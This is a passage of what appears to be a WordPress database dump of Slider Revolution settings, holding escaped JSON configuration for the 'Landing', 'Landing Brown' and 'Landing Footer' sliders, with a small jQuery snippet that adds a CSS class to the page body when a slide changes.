",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"parallaxtobottom\",\"transitionDuration\":\"300\",\"delay\":\"2000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1366,\"t\":768,\"m\":480},\"height\":{\"d\":868,\"n\":768,\"t\":924,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi8.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":true,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":true,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":true,\"rtl\":false,\"style\":4,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"right\",\"vertical\":\"center\",\"direction\":\"vertical\",\"offsetX\":\"45\",\"offsetY\":\"\",\"align\":\"slider\",\"space\":\"13\",\"hideDelay\":\"1280\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1050\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.1.6\"}','{\"version\":\"6.1.6\"}',''),(9,'Landing','landing','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"landing\\\\\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"3500\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":426,\"n\":410,\"t\":500,\"m\":400},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#fed3c3\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false}}','{\"version\":\"6.1.6\"}',''),(10,'Landing Brown','landingbrown','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"landingbrown\\\\\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":800,\"t\":778,\"m\":480},\"height\":{\"d\":902,\"n\":804,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#b68767\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false}}','{\"version\":\"6.1.6\"}',''),(11,'Landing Footer','landingfooter','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"landingfooter\\\\\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":650,\"n\":695,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#2d2a2a\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center 